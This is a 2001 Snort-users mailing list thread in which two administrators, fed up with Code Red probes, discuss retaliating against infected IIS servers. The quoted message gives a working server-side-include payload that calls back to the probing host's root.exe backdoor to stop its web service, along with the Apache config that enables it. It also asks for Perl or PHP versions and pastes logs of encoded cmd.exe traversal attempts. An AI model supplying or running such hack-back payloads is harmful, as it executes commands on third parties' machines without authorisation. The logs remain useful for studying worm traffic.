Re: Shut them down, I have had enough...

["Daniel Holden" <dholden () idsb net>]

I too would be very interested in this.  I seem to get alot of code red crap
from the same sites.  I've emailed them but nothing ever happens.  I just
get their automated email back.  Screw them!  If they can't take the time to
clean their servers then I'm all for sending them something back in return.


----- Original Message -----
From: "Franki" <franki () gshop com au>
To: <snort-users () lists sourceforge net>
Sent: Wednesday, September 19, 2001 8:03 AM
Subject: [Snort-users] Shut them down, I have had enough...


> Hi all,
>
> I have seen in the past a php script that would shut down infected IIS
> servers that are trying to infect linux box's
>
> I havn't done it, because I didn't really think it was that nice a thing
to
> do...
>
> This is the one I saw...
>
> > > 1) Create a file called default.ida, in there add this:
> > >
> > > <!--#exec cmd="lynx -source
> > > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
> > >
> > > On one line, if it wraps in your mail client....
> > >
> > > 2) Then in your httpd.conf or similar... add this
> > >
> > > AddType text/html .ida
> > > AddHandler server-parsed .ida
>
> but I checked my personal server this morning and the httpd error log
looks
> like this. (see the end of the email)
>
> anyway, I'd like to setup the server to shutdown any IIS box that asks for
> cmd.exe or root.exe
>
> Does anyone know how this can be done using either perl or php???
>
> has anyone already done it? if so where can I find it???
>
> I am tired of this, I have a very limited bandwidth, and even if it isn't
> doing any damage, its chewing up the bandwidth.. and costing me money, as
> far as I am now concerned, they have three choices, either patch their
> server, pay my bandwidth bill, or get their servers shut down alot...
>
> Any help would be much appreciated.
>
> Regards
>
> Frank
> Perth WA
>
>
>
> [Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/c/winnt/system32/cmd.exe
> [Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/d/winnt/system32/cmd.exe
> [Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
> [Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32
> /cmd.exe
> [Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32
> /cmd.exe
> [Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w
> innt/system32/cmd.exe
> [Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
> [Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not
> exist: /var/www/html/otherwebs/epay/default.ida
> [Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/root.exe
> [Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/MSADC/root.exe
> [Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/c/winnt/system32/cmd.exe
> [Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/d/winnt/system32/cmd.exe
> [Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
> [Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32
> /cmd.exe
> [Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32
> /cmd.exe
> [Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w
> innt/system32/cmd.exe
> [Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
> [root@mail httpd]# tail -50 error_log
> [Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not
> exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not
> exist:
/var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not
> exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi
> nnt/system32/cmd.exe
> [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not
> exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not
> exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c
> ../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not
> exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
> [Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not
> exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32
> /cmd.exe
> [Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not
> exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
>
>
>
> _______________________________________________
> Snort-users mailing list
> Snort-users () lists sourceforge net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users